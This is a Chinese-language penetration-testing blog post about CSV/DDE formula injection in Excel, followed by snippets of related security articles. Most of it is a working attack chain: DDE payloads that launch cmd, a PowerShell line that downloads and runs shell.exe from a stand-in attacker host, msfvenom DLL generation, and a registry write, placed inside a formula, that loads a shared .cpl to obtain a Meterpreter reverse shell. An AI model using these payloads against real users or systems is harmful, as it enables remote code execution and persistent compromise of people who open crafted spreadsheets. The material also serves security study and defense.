关于csv文件在渗透中的妙用

VSole2021-10-07 07:29:46

何为csv

逗号分隔值(Comma-Separated Values,CSV,有时也称为字符分隔值,因为分隔字符也可以不是逗号),其文件以纯文本形式存储表格数据(数字和文本)。纯文本意味着该文件是一个字符序列,不含必须像二进制数字那样被解读的数据。CSV文件由任意数目的记录组成,记录间以某种换行符分隔;每条记录由字段组成,字段间的分隔符是其它字符或字符串,最常见的是逗号或制表符。通常,所有记录都有完全相同的字段序列。通常都是纯文本文件。建议使用WORDPAD或是记事本来开启,再则先另存新档后用EXCEL开启,也是方法之一。

csv漏洞

csv漏洞即攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。

首先产生漏洞的第一个原因就是特殊符号

这里首先尝试在excel里面输入=1+2,回车过后发现csv自动帮我们运算出了结果

这里是因为在csv文件中+、-、@、=都会解释成公式,自动帮我们得出运算结果

第二个原因就是DDE,DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。DDE支持Microsoft Excel,LibreOffice和Apache OpenOffice。Excel、Word、Rtf、Outlook都可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用。

这里首先尝试在A1单元格里面调用cmd,填入命令=1+cmd|'/C calc'!A0并保存

然后重新打开会弹出一个框,这里为了漏洞复现,我们选择是

继续点击更新

现在的csv好像已经默认禁用了DDE,这里我们点确定

点击启用内容

cmd就会调用calc

csv注入

那么我们知道了csv产生的原因,这里我们就可以调用cmd执行我们的恶意代码,通过在excel表里面进行操作调用其他进程,例子如下

@SUM(1+1)*cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

cmd后面跟的是命令,直接替换要执行的命令即可,如这里我要打开桌面的demo.txt

=SUM(1+1)*notepad|' C:\Users\61408\Desktop\demo.txt'!A0

保存并退出信任之后即可弹出

csv反弹meterpreter

kali生成一个简单的弹calc的dll,并将dll后缀名改为cpl

msfvenom -p windows/exec CMD=calc.exe -f dll > hook.dll
mv hook.dll hook.cpl

然后在win7里面设置一个共享文件夹把hook.cpl放入

执行命令添加到注册表,这里360是不拦截的

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /t REG_SZ /d "\\Win7-2021EDCAZU\test\hook.cpl"

打开控制面板即可打开计算器

使用Procmon跟踪进程发现控制面板会寻找这个注册表路径并加载里面的cpl

这里插一句何为cpl文件

CPL文件,又叫控制面板项(Control Panel Item),多保存于系统安装目录的system32文件夹下,它们分别对应着控制面板中的项目,普通用户的访问受到限制。它可由shell32.dll、control.exe打开。此外,你也可以直接在资源管理器中双击调用Open命令打开(实质上调用了shell32.dll)。
CPL文件本质是Windows可执行性文件,但不属于可以直接独立运行的文件,通常由shell32.dll打开。
system32目录里绝大多数cpl文件是Windows系统文件,具有“存档”文件属性,Windows操作系统的文件保护功能保护它们不被篡改。

实验结束,回到上一层话题,使用xls执行cmd命令添加这个注册表路径并执行控制面板获取meterpreter

流程大概是这样的:

这里再生成一个反弹的dll并改名为cpl(这里生成之后就直接放过去了,忘记改名了,是说一直实验不成功)

放到共享文件夹里面

msf开启监听

这里实验的时候发现一个问题,因为我是win7开的共享准备在2008里面添加cpl,但是我2008里面安装不了office,于是我就换了一下,但是我发现不同的系统cpl文件的路径不同,有的甚至没有这个文件夹

2008是正常的

然后我换到win7里面发现根本就没有这个文件夹

win10也是如此

再找了台域内的win7直接连Controls Folder这个文件夹都没有,好家伙

这里我直接执行命令的话是不成功的,这里我就手动添加了Control Panel\Cpls这个路径

=cmd|' /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /t REG_SZ /d "\\WIN-339FINFSV15\testcpl\hook.cpl"'!_xlbgnm.A1

然后打开控制面板

即可得到反弹的shell

后记

关于Control Panel\Cpls这个路径在不同系统中不同情况的问题,我百度并没有找到能够揭开我疑惑的答案,如果有知道为什么的师傅还请不吝赐教。

控制面板csv
本作品采用《CC 协议》,转载必须注明作者和本文链接
何为csv逗号分隔值(Comma-Separated Values,CSV,有时也称为字符分隔值,因为分隔字
Microsoft发布安全更新,修复了多个Microsoft中的漏洞。
COM劫持实战演示
2021-10-19 09:40:38
com劫持前面说了这么多的基础知识来到今天的正文,首先要了解com组件的加载过程
Cuckoo沙箱将在几秒钟内为您提供一些详细的分析结果,概述该文件在隔离环境中执行时的情况。在2010年夏天开启该工作之后,第一个测试版于2011年2月5日发布,这是Cuckoo第一次公开发布。2011年3月,在谷歌Code Summer of 2011期间,Cuckoo再次被选为蜜网项目的支持项目,在此期间Dario Fernandes加入了该项目并扩展了其功能。恶意软件在执行过程中创建、删除和下载的文件。
本研究的系统分析揭示了一系列漏洞,这些漏洞证明了 EVCSMS 对远程网络攻击的不安全性。考虑到此类攻击的可行性,还讨论了针对 EV 充电站 (EVCS,EV Charging Stations) 及其用户的攻击影响。
风险通告 近日,奇安信CERT监测到微软修复了Microsoft Exchange多个高危漏洞。通过组合利用这些漏洞能够在未经身份验证的情况下远程获取目标服务器权限。其中包括CVE-2021-26855:服务端请求伪造漏洞;CVE-2021-2685...
网络安全初创公司 Buguard 近日透露,已经有黑客已经接管了数字支付巨头 Wiseasy 公司的控制面板,该面板可用于远程管理和控制数千台 Wiseasy 的信用卡支付终端。Buguard 表示在今年 7 月初就已经将此事报告给 Wiseasy。不过 Mohammed 表示该公司原本计划召开会议讨论披露这次安全事件,但随后在没有警告的情况下就取消了,公司也拒绝透露相关的信息。
小编了解到在2020年的8月份,Linux面板7.4.2 版本/Windows面板6.8 版本的宝塔面板被曝最新严重数据库安全漏洞。随后开发商堡塔安全也紧急发布通知短信告知,让所有用户升级到最新版本。我们逐步分析一下:账号的加密方式为将输入的username(账号)进行MD5加密,之后传输给后端。由此可见宝塔面板的安全性足以让大部分初级的运维人员高枕无忧了。
PRODAFT对TeslaGun受害者数据的分析表明,自2020年7月以来,该组织的网络钓鱼和有针对性的活动已达到至少8160个目标。“很明显,TA505正在积极寻找在线银行或零售用户,包括加密钱包和电子商务账户,”研究人员指出,并引用了TeslaGun小组中敌对团体的评论。美国卫生与公众服务部警告称,该组织通过旨在窃取知识产权和勒索软件的数据过滤攻击,对卫生部门构成了重大威胁。
近期,火绒安全截获到Magniber勒索病毒最新变种,其病毒文件名会伪装成杀毒软件更新程序,并以控制面板组件动态库的形式传播,手段非常具有欺骗性。火绒安全软件最新版本可成功查杀Magniber勒索病毒及新变种。近期Magniber新变种各省感染情况一览Magniber勒索病毒历史上一共出现过两次变种。
VSole
网络安全专家